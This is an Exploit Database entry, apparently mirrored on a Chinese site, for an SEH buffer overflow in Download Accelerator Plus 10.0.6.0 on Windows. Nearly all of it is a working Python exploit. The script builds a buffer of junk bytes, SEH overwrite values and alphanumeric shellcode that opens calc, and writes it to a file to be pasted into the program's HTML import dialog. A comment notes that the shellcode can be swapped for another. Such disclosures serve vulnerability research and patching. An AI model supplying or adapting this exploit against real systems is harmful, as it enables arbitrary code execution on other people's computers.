Download Accelerator Plus (DAP) 10.0.6.0 – SEH Buffer Overflow

• Exploit Database
• 108 阅读

• 作者： Peyman Forouzan
  日期： 2019-04-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46673/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47

  #!/usr/bin/python # # Exploit Title: Download Accelerator Plus DAP 10.0.6.0 - SEH Buffer Overflow # # Date: 2019-04-05# # Vendor Homepage: http://www.speedbit.com/dap/ # # Software Link: http://www.speedbit.com/dap/download/downloading.asp # # Exploit Author: Peyman Forouzan # # Tested Version: 10.0.6.0# # Tested on: Win10 Enterprise 64 bit# # Note : In other versions of Windows, it will cause the program to Crash # # Special Thanks to my wife # # Steps : # #1- Run python code : Dap.py ( Dap.txt is created ) # #2- Open the APP --> File --> Import --> Html Web Page --> paste in contents from the Dap.txt into# # Import Web Page --> Ok --> Shellcode (Calc) open# #---------------------------------------------------------------------------------------------------------#   junk = "\x41" * 4091   nseh = "\x61\x62" seh= "\x57\x42" # Overwrite Seh # 0x00420057 : {pivot 8}   prepare ="\x44\x6e\x53\x6e\x58\x6e\x05" prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3" prepare += "\x41" * 107;   # calc unicode shell - can be replaced with shellcode calc ="PPYAIAIAIAIAQATAXAZAPA3QADAZA" calc += "BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA" calc += "58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB" calc += "AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K" calc += "22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL" calc += "MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55" calc += "Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V" calc += "NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB" calc += "R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT" calc += "NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU" calc += "89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM" calc += "KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC" calc += "QQ2LRCM0LJA";   buffer = "http://" + junk + nseh + seh + prepare + calc print "[+] Creating %s bytes payload ..." %len(buffer) f = open ("Dap.txt", "w") print "[+] File created!" f.write(buffer) f.close()